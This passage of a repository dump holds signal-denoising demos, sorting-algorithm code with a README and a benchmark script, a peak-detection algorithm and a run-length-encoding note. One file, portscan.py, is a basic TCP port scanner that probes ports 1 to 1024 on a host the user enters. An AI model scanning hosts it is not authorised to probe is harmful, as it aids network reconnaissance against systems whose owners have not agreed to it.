(pywt.threshold(i, value=uthresh, mode="soft") for i in coeff[1:]) 103 | # reconstruct the signal using the thresholded coefficients 104 | y = pywt.waverec(coeff, wavelet, mode="per") 105 | f, ax = plt.subplots() 106 | ax.plot(x, color="b", alpha=0.5) 107 | ax.plot(y, color="b") 108 | if title: 109 | ax.set_title(title) 110 | ax.set_xlim((0,len(y))) 111 | ```
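The threshold rule used in the smoother above (a MAD-based noise estimate times sqrt(2 ln n), the so-called universal threshold) can be checked numerically with NumPy alone, no pywt required; the noise level and sample size here are arbitrary choices for illustration:

```python
import numpy as np

rng = np.random.default_rng(0)
n = 100_000
x = rng.normal(0.0, 1.0, n)        # pure unit-variance Gaussian noise

# robust sigma estimate: median absolute deviation, rescaled so it is
# consistent for Gaussian data (0.6745 is the MAD of a standard normal)
sigma = np.median(np.abs(x - np.median(x))) / 0.6745

# the "universal" threshold from the wavelet smoother
uthresh = sigma * np.sqrt(2 * np.log(n))

print(round(sigma, 2), round(uthresh, 2))  # sigma ~ 1.0, uthresh ~ 4.8
```

The MAD-based estimate recovers the true noise level even when a few large outliers (or, in the wavelet case, genuine signal coefficients) are mixed in, which is why it is preferred here over a plain standard deviation.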
-------------------------------------------------------------------------------- /python/noise-reduction/demo_filter_signal.py: -------------------------------------------------------------------------------- 1 | ### Example script showing how to perform a Total-Variation filtering with proxTV 2 | import prox_tv as ptv 3 | import numpy as np 4 | import matplotlib.pyplot as plt 5 | import time 6 | 7 | def _blockysignal(): 8 | """Generates a blocky signal for the demo""" 9 | N = 1000 10 | s = np.zeros((N,1)) 11 | s[int(N/4):int(N/2)] = 1 12 | s[int(N/2):int(3*N/4)] = -1 13 | s[int(3*N/4):int(-N/8)] = 2 14 | return s 15 | 16 | ### TV-L1 filtering 17 | 18 | # Generate impulse (blocky) signal 19 | s = _blockysignal() 20 | 21 | # Introduce noise 22 | n = s + 0.5*np.random.rand(*np.shape(s)) 23 | 24 | # Filter using TV-L1 25 | lam=20 26 | print('Filtering signal with TV-L1...') 27 | start = time.time() 28 | f = ptv.tv1_1d(n,lam) 29 | end = time.time() 30 | print('Elapsed time ' + str(end-start)) 31 | 32 | # Plot results 33 | plt.subplot(3, 1, 1) 34 | plt.title('TVL1 filtering') 35 | plt.plot(s) 36 | plt.ylabel('Original') 37 | plt.grid(True) 38 | 39 | plt.subplot(3, 1, 2) 40 | plt.plot(n) 41 | plt.ylabel('Noisy') 42 | plt.grid(True) 43 | 44 | plt.subplot(3, 1, 3) 45 | plt.plot(f) 46 | plt.ylabel('Filtered') 47 | plt.grid(True) 48 | 49 | plt.show() 50 | 51 | ### TV-L2 filtering 52 | 53 | # Generate sinusoidal signal 54 | N = 1000 55 | s = np.sin(np.arange(1,N+1)/10.0) + np.sin(np.arange(1,N+1)/100.0) 56 | 57 | # Introduce noise 58 | n = s + 0.5*np.random.randn(*np.shape(s)) 59 | 60 | # Filter using TV-L2 61 | lam=100; 62 | print('Filtering signal with TV-L2...') 63 | start = time.time() 64 | f = ptv.tv2_1d(n,lam); 65 | end = time.time() 66 | print('Elapsed time ' + str(end-start)) 67 | 68 | # Plot results 69 | plt.subplot(3, 1, 1) 70 | plt.title('TVL2 filtering') 71 | plt.plot(s) 72 | plt.ylabel('Original') 73 | plt.grid(True) 74 | 75 | plt.subplot(3, 1, 2) 76 | 
plt.plot(n) 77 | plt.ylabel('Noisy') 78 | plt.grid(True) 79 | 80 | plt.subplot(3, 1, 3) 81 | plt.plot(f) 82 | plt.ylabel('Filtered') 83 | plt.grid(True) 84 | 85 | plt.show() 86 | 87 | ### Weighted TV-L1 filtering 88 | 89 | # Generate impulse (blocky) signal 90 | s = _blockysignal() 91 | 92 | # Introduce noise 93 | n = s + 0.5*np.random.randn(*np.shape(s)) 94 | 95 | # Generate weights 96 | lam = np.linspace(0,2,N-1) 97 | 98 | # Filter using weighted TV-L1 99 | print('Filtering signal with weighted TV-L1...') 100 | start = time.time() 101 | f = ptv.tv1w_1d(n, lam) 102 | end = time.time() 103 | print('Elapsed time ' + str(end-start)) 104 | 105 | # Plot results 106 | plt.subplot(4, 1, 1) 107 | plt.title('Weighted TVL1 filtering') 108 | plt.plot(s) 109 | plt.ylabel('Original') 110 | plt.grid(True) 111 | 112 | plt.subplot(4, 1, 2) 113 | plt.plot(n) 114 | plt.ylabel('Noisy') 115 | plt.grid(True) 116 | 117 | plt.subplot(4, 1, 3) 118 | plt.plot(f) 119 | plt.ylabel('Filtered') 120 | plt.grid(True) 121 | 122 | plt.subplot(4, 1, 4) 123 | plt.fill_between(np.arange(1,N), 0, lam) 124 | plt.ylabel('Weights') 125 | plt.grid(True) 126 | 127 | plt.show() 128 | 129 | -------------------------------------------------------------------------------- /python/portscan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #!Developer Osama Mahmood 3 | #!Email : osama.mahmood40@gmail.com 4 | #!Website : http://securitytraning.com 5 | 6 | from socket import * 7 | import os 8 | 9 | if os.name == 'nt': 10 | os.system('cls') 11 | else: 12 | os.system('clear') 13 | 14 | 15 | print("*******************************************") 16 | print("************Simple Port Scanner************") 17 | print("*******************************************") 18 | 19 | if __name__ == '__main__': 20 | targetserver = input('Enter host to scan: ') 21 | targetIP = gethostbyname(targetserver) 22 | print('Ready to scan :3', targetIP) 23 | 24 | #scan reserved
ports 25 | for i in range(1, 1025): 26 | s = socket(AF_INET, SOCK_STREAM) 27 | 28 | result = s.connect_ex((targetIP, i)) 29 | 30 | if(result == 0) : 31 | print 'Port %d: OPEN' % (i,) 32 | s.close() 33 | 34 | print '***********************************************' 35 | print "Scanning finished" 36 | print '***********************************************' 37 | -------------------------------------------------------------------------------- /python/pySorting/README.md: -------------------------------------------------------------------------------- 1 | # PySorting 2 | 3 | A Python program for different sorting algorithms 4 | 5 | ## Sorting Algorithms: 6 | 7 | ### Insertion Sort 8 | 9 | ![insert-sort](./images/insert-sort.gif) 10 | 11 | Image Source:[wikipedia](https://en.wikipedia.org/wiki/Insertion_sort) 12 | 13 | A simple sorting algorithm that builds the final sorted array (or list) one item at a time. It is much less efficient on large lists than more advanced algorithms such as quicksort, heapsort, or merge sort. 14 | 15 | __Properties__ 16 | * Data Structure: Array 17 | * Worst case performance: O(n^2) comparisons, swaps 18 | * Best case performance: O(n) comparisons, O(1) swaps 19 | * Average case performance: O(n^2) comparisons, swaps 20 | * Worst-case space complexity: O(n) total, O(1) auxiliary 21 | 22 | ### Bubble sort 23 | 24 | ![bubble-sort](./images/bubble-sort.gif) 25 | 26 | Image Source:[wikipedia](https://en.wikipedia.org/wiki/Bubble_sort) 27 | 28 | A simple sorting algorithm that repeatedly steps through the list to be sorted, compares each pair of adjacent items and swaps them if they are in the wrong order. The pass through the list is repeated until no swaps are needed, which indicates that the list is sorted. 
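As a quick illustration of the pass-until-no-swaps rule described above, here is a minimal Python sketch (illustrative only, separate from the pySorting.py implementation later in this repo):

```python
def bubble_sort_sketch(items):
    """Repeatedly bubble the largest remaining element to the end;
    stop early once a full pass makes no swaps (the list is sorted)."""
    data = list(items)  # work on a copy
    n = len(data)
    for end in range(n - 1, 0, -1):
        swapped = False
        for j in range(end):
            if data[j] > data[j + 1]:
                data[j], data[j + 1] = data[j + 1], data[j]
                swapped = True
        if not swapped:
            break  # no swaps in this pass: already sorted
    return data

print(bubble_sort_sketch([5, 1, 4, 2, 8]))  # [1, 2, 4, 5, 8]
```

The early exit is what gives bubble sort its O(n) best case on already-sorted input.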
29 | 30 | __Properties__ 31 | * Data Structure: Array 32 | * Worst case performance: O(n^2) 33 | * Best case performance: O(n) 34 | * Average case performance: O(n^2) 35 | * Worst-case space complexity: O(1) auxiliary 36 | 37 | ### Quick sort 38 | 39 | ![quick-sort](./images/Sorting_quicksort.gif) 40 | 41 | Image Source:[wikipedia](https://en.wikipedia.org/wiki/Quicksort) 42 | 43 | An efficient sorting algorithm, serving as a systematic method for placing the elements of an array in order. 44 | 45 | __Properties__ 46 | * Worst case performance O(n^2) 47 | * Best case performance O(n log n) (simple partition) or O(n) (three-way partition and equal keys) 48 | * Average case performance O(n log n) 49 | * Worst-case space complexity O(n) auxiliary (naive), O(log n) auxiliary (Sedgewick 1978) 50 | 51 | ### Selection sort 52 | 53 | ![selection-sort](./images/Selection_sort.gif) 54 | 55 | Image Source:[wikipedia](https://en.wikipedia.org/wiki/Selection_sort) 56 | 57 | An in-place comparison sort, notable for its simplicity. It divides the input list into two parts: the sublist of items already sorted, and the sublist of items remaining to be sorted that occupy the rest of the list. 58 | 59 | __Properties__ 60 | * Data Structure: Array 61 | * Worst case performance: O(n^2) 62 | * Best case performance: O(n^2) 63 | * Average case performance: O(n^2) 64 | * Worst-case space complexity: O(n) total, O(1) auxiliary 65 | 66 | ### Shell sort 67 | 68 | ![shell-sort](./images/Sorting_shellsort.gif) 69 | 70 | Image Source:[wikipedia](https://en.wikipedia.org/wiki/Shellsort) 71 | 72 | The method starts by sorting pairs of elements far apart from each other, then progressively reducing the gap between elements to be compared. Starting with far-apart elements, it can move some out-of-place elements into position faster than a simple nearest-neighbor exchange.
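The gap-reduction idea just described can be sketched in Python using Shell's original n/2, n/4, ..., 1 gap sequence (a minimal sketch, not the repo's implementation):

```python
def shell_sort_sketch(items):
    """Gapped insertion sort: start with a large gap and halve it,
    finishing with an ordinary insertion sort at gap 1."""
    data = list(items)
    gap = len(data) // 2
    while gap > 0:
        for i in range(gap, len(data)):
            val = data[i]
            j = i
            # shift gap-distant larger elements to the right
            while j >= gap and data[j - gap] > val:
                data[j] = data[j - gap]
                j -= gap
            data[j] = val
        gap //= 2
    return data

print(shell_sort_sketch([23, 12, 1, 8, 34, 54, 2, 3]))  # [1, 2, 3, 8, 12, 23, 34, 54]
```

Other gap sequences (Knuth, Pratt, Ciura) change the worst-case bound, which is why the complexity depends on the sequence chosen.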
73 | 74 | __Properties__ 75 | * Data Structure: Array 76 | * Worst case performance: O(n (log n)^2) (depends on gap sequence) 77 | * Best case performance: O(n log n) 78 | * Average case performance: depends on gap sequence 79 | * Worst-case space complexity: O(n) total, O(1) auxiliary 80 | 81 | ### Merge sort 82 | 83 | ![merge-sort](./images/Merge-sort.gif) 84 | 85 | Image Source:[wikipedia](https://en.wikipedia.org/wiki/Merge_sort) 86 | 87 | A divide and conquer sorting algorithm. Most implementations produce a stable sort, which means that the implementation preserves the input order of equal elements in the sorted output. 88 | 89 | __Properties__ 90 | * Data Structure: Array 91 | * Worst case performance: O(n log n) 92 | * Best case performance: O(n log n) typical, O(n) natural variant 93 | * Average case performance: O(n log n) 94 | * Worst-case space complexity: O(n) total, O(1) auxiliary 95 | 96 | ### Heap sort 97 | 98 | ![heap-sort](./images/Heapsort.gif) 99 | 100 | Image Source:[wikipedia](https://en.wikipedia.org/wiki/Heapsort) 101 | 102 | A comparison-based sorting algorithm. It can be thought of as an improved selection sort: it divides its input into a sorted and an unsorted region, and it iteratively shrinks the unsorted region by extracting the largest element and moving it to the sorted region. 103 | 104 | __Properties__ 105 | * Data Structure: Array 106 | * Worst case performance: O(n log n) 107 | * Best case performance: O(n log n) 108 | * Average case performance: O(n log n) 109 | * Worst-case space complexity: O(1) auxiliary 110 | 111 | ### Gnome sort 112 | 113 | ![gnome-sort](./images/Sorting_gnomesort.gif) 114 | 115 | Image Source:[wikipedia](https://en.wikipedia.org/wiki/Gnome_sort) 116 | 117 | It is similar to insertion sort, except that moving an element to its proper place is accomplished by a series of swaps, as in bubble sort.
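The swap-and-step-back behaviour described above can be sketched in a few lines of Python (illustrative only; pySorting.py in this repo has its own version):

```python
def gnome_sort_sketch(items):
    """Walk forward while adjacent pairs are in order; on an inversion,
    swap the pair and step back to re-check the previous position."""
    data = list(items)
    i = 1
    while i < len(data):
        if i == 0 or data[i] >= data[i - 1]:
            i += 1          # in order: move forward
        else:
            data[i], data[i - 1] = data[i - 1], data[i]
            i -= 1          # swapped: step back and re-check
    return data

print(gnome_sort_sketch([3, 1, 2]))  # [1, 2, 3]
```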
118 | 119 | __Properties__ 120 | * Data Structure: Array 121 | * Worst case performance: O(n^2) 122 | * Best case performance: Ω(n) 123 | * Average case performance: O(n^2) 124 | * Worst-case space complexity: O(1) auxiliary 125 | 126 | ### Cocktail sort 127 | 128 | ![cocktail-sort](./images/Sorting_shaker_sort.gif) 129 | 130 | Image Source:[wikipedia](https://en.wikipedia.org/wiki/Cocktail_shaker_sort) 131 | 132 | Bidirectional bubble sort: a variation of bubble sort that sorts in both directions on each pass through the list. 133 | 134 | __Properties__ 135 | * Data Structure: Array 136 | * Worst case performance: O(n^2) 137 | * Best case performance: O(n) 138 | * Average case performance: O(n^2) 139 | * Worst-case space complexity: O(1) 140 | 141 | ## How-To 142 | 143 | The code is compatible with both Python 2.x and Python 3.x; it uses only the standard library, so no external dependencies are needed. 144 | -------------------------------------------------------------------------------- /python/pySorting/demo.py: -------------------------------------------------------------------------------- 1 | # demo.py 2 | 3 | import time, random 4 | import pySorting as PySorting  # the module file is pySorting.py 5 | 6 | print("\nUsing this list to check sorting:") 7 | print ("Original list:") 8 | print([1,5,0,6,10,3]) 9 | print ("Insertion sort:") 10 | print(PySorting.insertion_sort([1,5,0,6,10,3])) 11 | print ("Bubble sort:") 12 | print(PySorting.bubble_sort([1,5,0,6,10,3])) 13 | print ("Quick sort:") 14 | print(PySorting.quick_sort([1,5,0,6,10,3])) 15 | print ("Selection sort:") 16 | print(PySorting.selection_sort([1,5,0,6,10,3])) 17 | print ("Shell sort:") 18 | print(PySorting.shell_sort([1,5,0,6,10,3])) 19 | print ("Merge sort:") 20 | print(PySorting.merge_sort([1,5,0,6,10,3])) 21 | print ("Heap sort:") 22 | print(PySorting.heap_sort([1,5,0,6,10,3])) 23 | print ("Gnome sort:") 24 | print(PySorting.gnome_sort([1,5,0,6,10,3])) 25 | print ("Cocktail sort:") 26 | print(PySorting.cocktail_sort([1,5,0,6,10,3])) 27 | 28 | 29 |
30 | 31 | print("\nUsing following method to time sorting:") 32 | 33 | sum = 0.0 34 | print ("Insertion sort:") 35 | for x in range(0,3): 36 | t1 = time.time() 37 | PySorting.insertion_sort([random.randint(0,1001) for x in range(0, 1000)]) 38 | t2 = time.time() 39 | print ("%0.3f ms" % ((t2 - t1)*1000.0)) 40 | sum += (t2 - t1)*1000.0 41 | print ("Average time: %0.3f ms\n" % (sum/3)) 42 | 43 | sum = 0.0 44 | print ("Bubble sort:") 45 | for x in range(0,3): 46 | t1 = time.time() 47 | PySorting.bubble_sort([random.randint(0,1001) for x in range(0, 1000)]) 48 | t2 = time.time() 49 | print ("%0.3f ms" % ((t2 - t1)*1000.0)) 50 | sum += (t2 - t1)*1000.0 51 | print ("Average time: %0.3f ms\n" % (sum/3)) 52 | 53 | 54 | sum = 0.0 55 | print ("Quick sort:") 56 | for x in range(0,3): 57 | t1 = time.time() 58 | PySorting.quick_sort([random.randint(0,1001) for x in range(0, 1000)]) 59 | t2 = time.time() 60 | print ("%0.3f ms" % ((t2 - t1)*1000.0)) 61 | sum += (t2 - t1)*1000.0 62 | print ("Average time: %0.3f ms\n" % (sum/3)) 63 | 64 | 65 | sum = 0.0 66 | print ("Selection sort:") 67 | for x in range(0,3): 68 | t1 = time.time() 69 | PySorting.selection_sort([random.randint(0,1001) for x in range(0, 1000)]) 70 | t2 = time.time() 71 | print ("%0.3f ms" % ((t2 - t1)*1000.0)) 72 | sum += (t2 - t1)*1000.0 73 | print ("Average time: %0.3f ms\n" % (sum/3)) 74 | 75 | sum = 0.0 76 | print ("Shell sort:") 77 | for x in range(0,3): 78 | t1 = time.time() 79 | PySorting.shell_sort([random.randint(0,1001) for x in range(0, 1000)]) 80 | t2 = time.time() 81 | print ("%0.3f ms" % ((t2 - t1)*1000.0)) 82 | sum += (t2 - t1)*1000.0 83 | print ("Average time: %0.3f ms\n" % (sum/3)) 84 | 85 | sum = 0.0 86 | print ("Heap sort:") 87 | for x in range(0,3): 88 | t1 = time.time() 89 | PySorting.heap_sort([random.randint(0,1001) for x in range(0, 1000)]) 90 | t2 = time.time() 91 | print ("%0.3f ms" % ((t2 - t1)*1000.0)) 92 | sum += (t2 - t1)*1000.0 93 | print ("Average time: %0.3f ms\n" % (sum/3)) 94 | 95 | 
sum = 0.0 96 | print ("Gnome sort:") 97 | for x in range(0,3): 98 | t1 = time.time() 99 | PySorting.gnome_sort([random.randint(0,1001) for x in range(0, 1000)]) 100 | t2 = time.time() 101 | print ("%0.3f ms" % ((t2 - t1)*1000.0)) 102 | sum += (t2 - t1)*1000.0 103 | print ("Average time: %0.3f ms\n" % (sum/3)) 104 | 105 | sum = 0.0 106 | print ("Cocktail sort:") 107 | for x in range(0,3): 108 | t1 = time.time() 109 | PySorting.cocktail_sort([random.randint(0,1001) for x in range(0, 1000)]) 110 | t2 = time.time() 111 | print ("%0.3f ms" % ((t2 - t1)*1000.0)) 112 | sum += (t2 - t1)*1000.0 113 | print ("Average time: %0.3f ms\n" % (sum/3)) 114 | 115 | -------------------------------------------------------------------------------- /python/pySorting/images/Heapsort.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/python/pySorting/images/Heapsort.gif -------------------------------------------------------------------------------- /python/pySorting/images/Merge-sort.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/python/pySorting/images/Merge-sort.gif -------------------------------------------------------------------------------- /python/pySorting/images/Selection_sort.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/python/pySorting/images/Selection_sort.gif -------------------------------------------------------------------------------- /python/pySorting/images/Sorting_gnomesort.gif: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/python/pySorting/images/Sorting_gnomesort.gif -------------------------------------------------------------------------------- /python/pySorting/images/Sorting_quicksort.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/python/pySorting/images/Sorting_quicksort.gif -------------------------------------------------------------------------------- /python/pySorting/images/Sorting_shaker_sort.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/python/pySorting/images/Sorting_shaker_sort.gif -------------------------------------------------------------------------------- /python/pySorting/images/Sorting_shellsort.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/python/pySorting/images/Sorting_shellsort.gif -------------------------------------------------------------------------------- /python/pySorting/images/bubble-sort.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/python/pySorting/images/bubble-sort.gif -------------------------------------------------------------------------------- /python/pySorting/images/insert-sort.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/python/pySorting/images/insert-sort.gif -------------------------------------------------------------------------------- 
/python/pySorting/pySorting.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # pySorting.py - implementations of sorting algorithms in Python 3 | 4 | """Implementations of sorting algorithms in Python 5 | 6 | :param alist: a mutable, unordered list 7 | :return: the same list, ordered ascending 8 | 9 | Examples: 10 | >>> insertion_sort([1,5,3,2,0]) 11 | [0, 1, 2, 3, 5] 12 | """ 13 | 14 | # concatenate two sorted lists, used in quick sort 15 | def _concatenate_lists(list_1, middle, list_2): 16 | alist = [] # create a new list 17 | if list_1 is not None: 18 | alist.extend(list_1) 19 | 20 | if middle is not None: 21 | alist.append(middle) # append the middle if there is one 22 | 23 | if list_2 is not None: 24 | alist.extend(list_2) # append each of the elements from list_2 25 | 26 | return alist # return the list 27 | 28 | # used in heap sorting 29 | def _heapify(unsorted, index, heap_size): 30 | greatest = index 31 | left_index = 2 * index + 1 32 | right_index = 2 * index + 2 33 | if left_index < heap_size and unsorted[left_index] > unsorted[greatest]: 34 | greatest = left_index 35 | 36 | if right_index < heap_size and unsorted[right_index] > unsorted[greatest]: 37 | greatest = right_index 38 | 39 | if greatest != index: 40 | tmp = unsorted[greatest] 41 | unsorted[greatest] = unsorted[index] 42 | unsorted[index] = tmp 43 | _heapify(unsorted, greatest, heap_size) 44 | 45 | 46 | 47 | 48 | 49 | def insertion_sort(alist): 50 | 51 | length = len(alist) 52 | for i in range(1,length): 53 | j = i 54 | # shift alist[j] left until the prefix alist[:i+1] is sorted 55 | while j > 0 and alist[j] < alist[j - 1]: 56 | alist[j], alist[j - 1] = alist[j - 1], alist[j] 57 | j -= 1 58 | 59 | 60 | 61 | 62 | return alist 63 | 64 | def bubble_sort(alist): 65 | length = len(alist) 66 | for i in range(length-1,0,-1): 67 | for j in
range(i): 68 | if alist[j] > alist[j+1]: 69 | tmp = alist[j] 70 | alist[j] = alist[j+1] 71 | alist[j+1] = tmp 72 | return alist 73 | 74 | def quick_sort(alist): 75 | smaller = [] 76 | greater = [] 77 | if len(alist) <= 1: 78 | return alist 79 | pivot = alist.pop() 80 | for i in alist: 81 | if i < pivot: 82 | smaller.append(i) 83 | else: 84 | greater.append(i) 85 | return _concatenate_lists(quick_sort(smaller), pivot, quick_sort(greater)) 86 | 87 | def selection_sort(alist): 88 | length = len(alist) 89 | for i in range(length-1, 0, -1): 90 | pos = 0 91 | for j in range(1, i+1): 92 | if alist[j] > alist[pos]: 93 | pos = j 94 | tmp = alist[i] 95 | alist[i] = alist[pos] 96 | alist[pos] = tmp 97 | return alist 98 | 99 | def shell_sort(alist): 100 | # shell sort using shell's gap sequence: n/2, n/4, ..., 1 101 | length = len(alist) 102 | gap = length // 2 103 | # loop over the gaps 104 | while gap > 0: 105 | # do the insertion sort 106 | for i in range(gap,length): 107 | val = alist[i] 108 | j = i 109 | while j >= gap and alist[j - gap] > val: 110 | alist[j] = alist[j - gap] 111 | j -= gap 112 | alist[j] = val 113 | gap //= 2 114 | return alist 115 | 116 | def merge_sort(alist): 117 | length = len(alist) 118 | if length > 1: 119 | midpoint = length // 2 120 | left_half = merge_sort(alist[:midpoint]) 121 | right_half = merge_sort(alist[midpoint:]) 122 | i = 0 123 | j = 0 124 | k = 0 125 | left_length = len(left_half) 126 | right_length = len(right_half) 127 | while i < left_length and j < right_length: 128 | if left_half[i] < right_half[j]: 129 | alist[k] = left_half[i] 130 | i += 1 131 | else: 132 | alist[k] = right_half[j] 133 | j += 1 134 | k += 1 135 | while i < left_length: 136 | alist[k] = left_half[i] 137 | i += 1 138 | k += 1 139 | while j < right_length: 140 | alist[k] = right_half[j] 141 | j += 1 142 | k += 1 143 | return alist 144 | 145 | def heap_sort(alist): 146 | length = len(alist) 147 | for i in range(length // 2 - 1,-1,-1): 148 | _heapify(alist, i, 
length) 149 | for i in range(length-1,0,-1): 150 | tmp = alist[0] 151 | alist[0] = alist[i] 152 | alist[i] = tmp 153 | _heapify(alist, 0, i) 154 | return alist 155 | 156 | def gnome_sort(alist): 157 | i = 1 158 | length = len(alist) 159 | while i < length: 160 | if alist[i] >= alist[i-1]: 161 | i += 1 162 | else: 163 | tmp = alist[i] 164 | alist[i] = alist[i-1] 165 | alist[i-1] = tmp 166 | if i > 1: 167 | i -= 1 168 | return alist 169 | 170 | def cocktail_sort(alist): 171 | length = len(alist) 172 | for i in range(length-1,0,-1): 173 | swapped = False 174 | for j in range(i,0,-1): 175 | if alist[j] < alist[j-1]: 176 | tmp = alist[j] 177 | alist[j] = alist[j-1] 178 | alist[j-1] = tmp 179 | swapped = True 180 | for j in range(i): 181 | if alist[j] > alist[j+1]: 182 | alist[j], alist[j+1] = alist[j+1], alist[j] 183 | swapped = True 184 | if not swapped: 185 | return alist 186 | return alist 187 | -------------------------------------------------------------------------------- /python/run-length-encoding/ThresholdingAlgo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/python/run-length-encoding/ThresholdingAlgo.gif -------------------------------------------------------------------------------- /python/run-length-encoding/ThresholdingAlgo.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Implementation of algorithm from http://stackoverflow.com/a/22640362/6029703 3 | import numpy as np 4 | import pylab 5 | 6 | def thresholding_algo(y, lag, threshold, influence): 7 | signals = np.zeros(len(y)) 8 | filteredY = np.array(y) 9 | avgFilter = [0]*len(y) 10 | stdFilter = [0]*len(y) 11 | avgFilter[lag - 1] = np.mean(y[0:lag]) 12 | stdFilter[lag - 1] = np.std(y[0:lag]) 13 | for i in range(lag, len(y)): 14 | if abs(y[i] - avgFilter[i-1]) > threshold * stdFilter[i-1]: 15 | if y[i] >
avgFilter[i-1]: 16 | signals[i] = 1 17 | else: 18 | signals[i] = -1 19 | 20 | filteredY[i] = influence * y[i] + (1 - influence) * filteredY[i-1] 21 | avgFilter[i] = np.mean(filteredY[(i-lag):i]) 22 | stdFilter[i] = np.std(filteredY[(i-lag):i]) 23 | else: 24 | signals[i] = 0 25 | filteredY[i] = y[i] 26 | avgFilter[i] = np.mean(filteredY[(i-lag):i]) 27 | stdFilter[i] = np.std(filteredY[(i-lag):i]) 28 | 29 | return dict(signals = np.asarray(signals), 30 | avgFilter = np.asarray(avgFilter), 31 | stdFilter = np.asarray(stdFilter)) 32 | 33 | 34 | 35 | # Data 36 | y = np.array([1,1,1.1,1,0.9,1,1,1.1,1,0.9,1,1.1,1,1,0.9,1,1,1.1,1,1,1,1,1.1,0.9,1,1.1,1,1,0.9, 37 | 1,1.1,1,1,1.1,1,0.8,0.9,1,1.2,0.9,1,1,1.1,1.2,1,1.5,1,3,2,5,3,2,1,1,1,0.9,1,1,3, 38 | 2.6,4,3,3.2,2,1,1,0.8,4,4,2,2.5,1,1,1]) 39 | 40 | # Settings: lag = 30, threshold = 5, influence = 0 41 | lag = 30 42 | threshold = 5 43 | influence = 0 44 | 45 | # Run algo with settings from above 46 | result = thresholding_algo(y, lag=lag, threshold=threshold, influence=influence) 47 | 48 | # Plot result 49 | pylab.subplot(211) 50 | pylab.plot(np.arange(1, len(y)+1), y) 51 | 52 | pylab.plot(np.arange(1, len(y)+1), 53 | result["avgFilter"], color="cyan", lw=2) 54 | 55 | pylab.plot(np.arange(1, len(y)+1), 56 | result["avgFilter"] + threshold * result["stdFilter"], color="green", lw=2) 57 | 58 | pylab.plot(np.arange(1, len(y)+1), 59 | result["avgFilter"] - threshold * result["stdFilter"], color="green", lw=2) 60 | 61 | pylab.subplot(212) 62 | pylab.step(np.arange(1, len(y)+1), result["signals"], color="red", lw=2) 63 | pylab.ylim(-1.5, 1.5) 64 | 65 | 66 | 67 | 68 | -------------------------------------------------------------------------------- /python/run-length-encoding/run-length-encoding.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | [find length of sequences of identical values in a numpy 
array](https://stackoverflow.com/questions/1066758/find-length-of-sequences-of-identical-values-in-a-numpy-array-run-length-encodi) 4 | 5 | Fully numpy vectorized and generic RLE for any array (works with strings, booleans etc too). 6 | Outputs tuple of run lengths, start positions, and values. 7 | 8 | ```python 9 | import numpy as np 10 | 11 | def rle(inarray): 12 | """ run length encoding. Partial credit to R rle function. 13 | Multi datatype arrays catered for including non Numpy 14 | returns: tuple (runlengths, startpositions, values) """ 15 | ia = np.array(inarray) # force numpy 16 | n = len(ia) 17 | if n == 0: 18 | return (None, None, None) 19 | else: 20 | y = np.array(ia[1:] != ia[:-1]) # pairwise unequal (string safe) 21 | i = np.append(np.where(y), n - 1) # must include last element posi 22 | z = np.diff(np.append(-1, i)) # run lengths 23 | p = np.cumsum(np.append(0, z))[:-1] # positions 24 | return(z, p, ia[i]) 25 | ``` 26 | 27 | Pretty fast (i7): 28 | ```python 29 | xx = np.random.randint(0, 5, 1000000) 30 | %timeit yy = rle(xx) 31 | 100 loops, best of 3: 18.6 ms per loop 32 | ``` 33 | Multiple data types: 34 | ```python 35 | rle([True, True, True, False, True, False, False]) 36 | Out[8]: 37 | (array([3, 1, 1, 2]), 38 | array([0, 3, 4, 5]), 39 | array([ True, False, True, False], dtype=bool)) 40 | 41 | rle(np.array([5, 4, 4, 4, 4, 0, 0])) 42 | Out[9]: (array([1, 4, 2]), array([0, 1, 5]), array([5, 4, 0])) 43 | 44 | rle(["hello", "hello", "my", "friend", "okay", "okay", "bye"]) 45 | Out[10]: 46 | (array([2, 1, 1, 2, 1]), 47 | array([0, 2, 3, 4, 6]), 48 | array(['hello', 'my', 'friend', 'okay', 'bye'], 49 | dtype='|S6')) 50 | ``` 51 | 52 | Same results as Alex Martelli above: 53 | ```python 54 | xx = np.random.randint(0, 2, 20) 55 | 56 | xx 57 | Out[60]: array([1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1]) 58 | 59 | am = runs_of_ones_array(xx) 60 | 61 | tb = rle(xx) 62 | 63 | am 64 | Out[63]: array([4, 5, 2, 5]) 65 | 66 | tb[0][tb[2] == 1] 
